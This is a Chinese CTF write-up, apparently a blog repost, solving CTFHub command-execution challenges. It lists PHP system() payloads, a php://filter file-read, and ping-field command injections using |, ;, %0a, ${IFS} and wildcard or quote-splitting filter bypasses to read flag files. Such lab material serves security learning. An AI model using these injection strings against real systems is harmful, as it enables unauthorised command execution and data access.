其他分享
首页 > 其他分享> > 命令执行漏洞

命令执行漏洞

作者:互联网

·题目http://challenge-0378149a0f46d029.sandbox.ctfhub.com:10800/

 

get方式传值,url后加?cmd=system(ls);                     (不要漏了“;”)

 

看根目录下   ?cmd=system('ls /');

 

?cmd=system('tac /flag_2004');

 

 

·题目http://challenge-6fb8e42b96a63453.sandbox.ctfhub.com:10800/

?file=php://filter/convert.base64-encode/resource=/flag

 

解码

 

 

 ·题目http://challenge-6660caa40be82b64.sandbox.ctfhub.com:10800/

 

输入 127.0.0.1 | ls

  

 

输入127.0.0.1 | cat 202181019121257.php                    查看页面源码

                          

 

 ·题目http://challenge-c96200db3f972f76.sandbox.ctfhub.com:10800/

 

127.0.0.1 | ls

 

127.0.0.1 | tail flag_6314271833697.php                         查看源码

                                           

 

 

 ·题目http://challenge-ff0e99647ad306e6.sandbox.ctfhub.com:10800/

 

127.0.0.1|ls(“|”前后没有空格)

 

 127.0.0.1|cat<flag_16032307622987.php                           查看源码

                                                                

 

·题目http://challenge-05e78f6ba53cf5e7.sandbox.ctfhub.com:10800/

127.0.0.1 | ls                                           127.0.0.1;cd flag_is_here;ls                              127.0.0.1;cd flag_is_here;flag_143711617532606.php                    查看源码

                                                                   

 

 ·题目http://challenge-1ee9812e9a3f3a43.sandbox.ctfhub.com:10800/

 

 

127.0.0.1 ;ls                                                     127.0.0.1 ; cat flag_7892805924148.php                               查看源码

                       

 

·题目http://challenge-5ab3b10220e4fbd2.sandbox.ctfhub.com:10800/

 

地址栏输入?ip=127.0.0.1%0als(需要在地址栏操作,在页面输入做不出来)            ?ip=127.0.0.1%0Als${IFS}fla?_is_here

                                    

 

?ip=127.0.0.1%0Acd${IFS}fla?_is_here%0aca''t${IFS}fla?_24430227214682.php        查看源码

                                                               

标签:执行,http,命令,0.1,漏洞,127.0,ls,ctfhub,10800
来源: https://www.cnblogs.com/blue-blue-blue-blue/p/16515331.html